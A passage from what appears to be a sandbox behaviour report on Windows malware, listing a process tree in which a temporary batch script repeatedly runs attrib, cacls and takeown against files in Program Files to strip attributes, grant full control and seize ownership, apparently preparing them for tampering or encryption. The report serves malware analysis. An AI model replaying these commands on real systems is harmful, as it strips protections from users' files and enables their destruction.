    cacls "C:\Program Files\Common Files\System\ado\msado28.tlb" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado28.tlb"
    3⤵
    PID:1472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msadomd28.tlb""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msadomd28.tlb"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msadomd28.tlb" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msadomd28.tlb"
    3⤵
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msadox28.tlb""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msadox28.tlb"
    3⤵
    - Views/modifies file attributes
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msadox28.tlb" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msadox28.tlb"
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui""
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui"
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\adcjavas.inc""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\adcjavas.inc"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\adcjavas.inc" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\adcjavas.inc"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\adcvbs.inc""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\adcvbs.inc"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\adcvbs.inc" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\adcvbs.inc"
    3⤵
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui"
    3⤵
    - Drops file in Program Files directory
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui"
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui"
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui"
    3⤵
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui"
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui"
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"
    3⤵
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui"
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui"
    3⤵
    - Modifies file permissions
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc"
    3⤵
    - Modifies file permissions
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll"
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\audiodepthconverter.ax""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\audiodepthconverter.ax"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\audiodepthconverter.ax" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\audiodepthconverter.ax"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\bod_r.TTF""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\bod_r.TTF"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\bod_r.TTF" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\bod_r.TTF"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\directshowtap.ax""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\directshowtap.ax"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\directshowtap.ax" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\directshowtap.ax"
    3⤵
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui"
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui"
    3⤵
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui"
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Eurosti.TTF""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Eurosti.TTF"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Eurosti.TTF" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Eurosti.TTF"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\fieldswitch.ax""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\fieldswitch.ax"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\fieldswitch.ax" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\fieldswitch.ax"
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\offset.ax""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\offset.ax"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\offset.ax" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\offset.ax"
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\rtstreamsink.ax""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\rtstreamsink.ax"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\rtstreamsink.ax" /E /G Admin:F /C
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\rtstreamsink.ax"
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\rtstreamsource.ax""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\rtstreamsource.ax"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\rtstreamsource.ax" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\rtstreamsource.ax"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\SecretST.TTF""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\SecretST.TTF"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\SecretST.TTF" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\SecretST.TTF"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\Common.fxh""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\Common.fxh"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\Common.fxh" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\Common.fxh"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DissolveAnother.png""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DissolveAnother.png"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DissolveAnother.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DissolveAnother.png"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DissolveNoise.png""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DissolveNoise.png"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DissolveNoise.png" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DissolveNoise.png"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png"
    3⤵
    - Views/modifies file attributes
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png""
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png"
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png""
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv""
  2⤵
  PID:1216
